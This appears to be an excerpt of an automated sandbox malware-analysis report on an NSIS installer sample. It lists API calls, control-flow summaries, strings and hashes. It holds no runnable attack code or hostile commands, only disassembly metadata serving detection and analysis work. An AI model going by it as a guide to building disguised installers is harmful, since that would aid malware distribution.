                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                    • CloseClipboard.USER32 ref: 0040546E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                    • String ID: @rD$New install of "%s" to "%s"${
                                                    • API String ID: 2110491804-2409696222
                                                    • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                    • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                    • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                    • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

                                                    Control-flow Graph: function entry at 00403883 (graph edge listing omitted)
                                                    APIs
                                                    • #17.COMCTL32 ref: 004038A2
                                                    • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                    • OleInitialize.OLE32(00000000), ref: 004038B4
                                                      • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                      • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                      • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                    • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                    • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                    • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                    • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                    • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                    • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                    • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                    • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                    • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                    • ExitProcess.KERNEL32 ref: 00403AF1
                                                    • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                    • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                    • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                    • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                    • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                    • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                    • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                    • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                    Similarity
                                                    • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                    • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                    • API String ID: 2435955865-239407132
                                                    • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                    • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                    • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                    • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                                    Control-flow Graph: function entry at 004074BB (graph edge listing omitted)
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                    • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                    • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                    • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                    • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                    • String ID:
                                                    • API String ID: 310444273-0
                                                    • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                    • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                    • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                    • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                    APIs
                                                    • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                    • FindClose.KERNEL32(00000000), ref: 004062EC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: Find$CloseFileFirst
                                                    • String ID:
                                                    • API String ID: 2295610775-0
                                                    • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                    • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                    • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                    • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                    Control-flow Graph

                                                    • Entry block 405479-40548b; basic blocks span 405479-405929. This address (00405479) is the dialog procedure handed to DialogBoxParamW at ref 00405BF2 in the next function record.
                                                    • API calls inside the graph: SetWindowPos, ShowWindow, DestroyWindow, SetWindowLongW, GetDlgItem, SendMessageW, IsWindowEnabled, SetClassLongW, KiUserCallbackDispatcher, EnableWindow, GetSystemMenu, EnableMenuItem, lstrlenW, SetWindowTextW, CreateDialogParamW, GetWindowRect, ScreenToClient
                                                    • Internal calls from the graph: 40139d, 40141d, 403d18, 403d3f, 403d85, 403d98, 403daf, 403dca, 406009, 406805
                                                    APIs
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                    • ShowWindow.USER32(?), ref: 004054D2
                                                    • DestroyWindow.USER32 ref: 004054E6
                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                    • GetDlgItem.USER32(?,?), ref: 00405523
                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                    • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                    • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                    • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                    • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                    • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                    • EnableWindow.USER32(?,?), ref: 00405757
                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                    • EnableMenuItem.USER32(00000000), ref: 00405774
                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                    • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                    • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                    • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                    • String ID: @rD
                                                    • API String ID: 3282139019-3814967855
                                                    • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                    • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                    • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                    • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    • Control-flow graph: entry block 4015a0-4015f4; basic blocks span 4015a0-4030f2. The block at 4015fa fans out to one handler block per installer instruction (Jump, Call, Sleep, BringToFront, SetFileAttributes, CreateDirectory, IfFileExists, Rename, and the path-resolution handlers), matching the format strings listed under Strings.
                                                    • API calls inside the graph: PostQuitMessage, Sleep, SetForegroundWindow, ShowWindow, SetFileAttributesW, CreateDirectoryW, GetLastError, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW
                                                    • Internal calls from the graph: 40137e, 40139d, 401446, 40145c, 404f72, 405d06, 405d59, 405f51, 406009, 4062a3, 4062d5, 406c68
                                                    APIs
                                                    • PostQuitMessage.USER32(00000000), ref: 00401648
                                                    • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                    • SetForegroundWindow.USER32(?), ref: 004016CB
                                                    • ShowWindow.USER32(?), ref: 00401753
                                                    • ShowWindow.USER32(?), ref: 00401767
                                                    • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                    • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                    • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                    • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                    • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                    • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                    • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                    Strings
                                                    • Rename: %s, xrefs: 004018F8
                                                    • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                    • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                    • Rename failed: %s, xrefs: 0040194B
                                                    • detailprint: %s, xrefs: 00401679
                                                    • Call: %d, xrefs: 0040165A
                                                    • SetFileAttributes failed., xrefs: 004017A1
                                                    • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                    • CreateDirectory: "%s" created, xrefs: 00401849
                                                    • BringToFront, xrefs: 004016BD
                                                    • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                    • Jump: %d, xrefs: 00401602
                                                    • Rename on reboot: %s, xrefs: 00401943
                                                    • Sleep(%d), xrefs: 0040169D
                                                    • Aborting: "%s", xrefs: 0040161D
                                                    • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                    • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                    • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                    • API String ID: 2872004960-3619442763
                                                    • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                    • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                    • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                    • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                    Control-flow Graph

                                                    • Entry block 40592c-405944 (calls 4062fc, the GetModuleHandleA/LoadLibraryA/GetProcAddress resolver listed below); basic blocks span 40592c-405c3e
                                                    • API calls inside the graph: lstrcatW, LoadImageW, RegisterClassW, SystemParametersInfoW, CreateWindowExW, ShowWindow, LoadLibraryW, GetClassInfoW, DialogBoxParamW, lstrlenW, lstrcmpiW, GetFileAttributesW
                                                    • Internal calls from the graph: 40141d, 403c68, 403e74, 403e95, 405047, 405d06, 405ed3, 405f51, 406009, 406722, 406751, 40677e, 406805, 4062fc
                                                    APIs
                                                      • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                      • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                      • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                    • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                    • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                    • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                    • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                    • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                    • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                      • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                    • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                    • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                    • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                    • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                    • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                    • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                    • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                    • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                    • API String ID: 608394941-1650083594
                                                    • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                    • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                    • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                    • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                    • lstrcatW.KERNEL32(00000000,00000000,%SenateRoof%,004CB0B0,00000000,00000000), ref: 00401A76
                                                    • CompareFileTime.KERNEL32(-00000014,?,%SenateRoof%,%SenateRoof%,00000000,00000000,%SenateRoof%,004CB0B0,00000000,00000000), ref: 00401AA0
                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                    • String ID: %SenateRoof%$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                    • API String ID: 4286501637-3060857477
                                                    • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                    • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                    • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                    • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                                    Control-flow Graph

                                                    control_flow_graph 587 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 590 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 587->590 591 4035d7-4035dc 587->591 599 403615 590->599 600 4036fc-40370a call 4032d2 590->600 592 4037b6-4037ba 591->592 602 40361a-403631 599->602 606 403710-403713 600->606 607 4037c5-4037ca 600->607 604 403633 602->604 605 403635-403637 call 403336 602->605 604->605 611 40363c-40363e 605->611 609 403715-40372d call 403368 call 403336 606->609 610 40373f-403769 GlobalAlloc call 403368 call 40337f 606->610 607->592 609->607 637 403733-403739 609->637 610->607 635 40376b-40377c 610->635 613 403644-40364b 611->613 614 4037bd-4037c4 call 4032d2 611->614 619 4036c7-4036cb 613->619 620 40364d-403661 call 405e0c 613->620 614->607 623 4036d5-4036db 619->623 624 4036cd-4036d4 call 4032d2 619->624 620->623 634 403663-40366a 620->634 631 4036ea-4036f4 623->631 632 4036dd-4036e7 call 407281 623->632 624->623 631->602 636 4036fa 631->636 632->631 634->623 640 40366c-403673 634->640 641 403784-403787 635->641 642 40377e 635->642 636->600 637->607 637->610 640->623 643 403675-40367c 640->643 644 40378a-403792 641->644 642->641 643->623 645 40367e-403685 643->645 644->644 646 403794-4037af SetFilePointer call 405e0c 644->646 645->623 647 403687-4036a7 645->647 650 4037b4 646->650 647->607 649 4036ad-4036b1 647->649 651 4036b3-4036b7 649->651 652 4036b9-4036c1 649->652 650->592 651->636 651->652 652->623 653 4036c3-4036c5 652->653 653->623
                                                    APIs
                                                    • GetTickCount.KERNEL32 ref: 00403598
                                                    • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                      • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                      • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                    • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                    Strings
                                                    • Null, xrefs: 0040367E
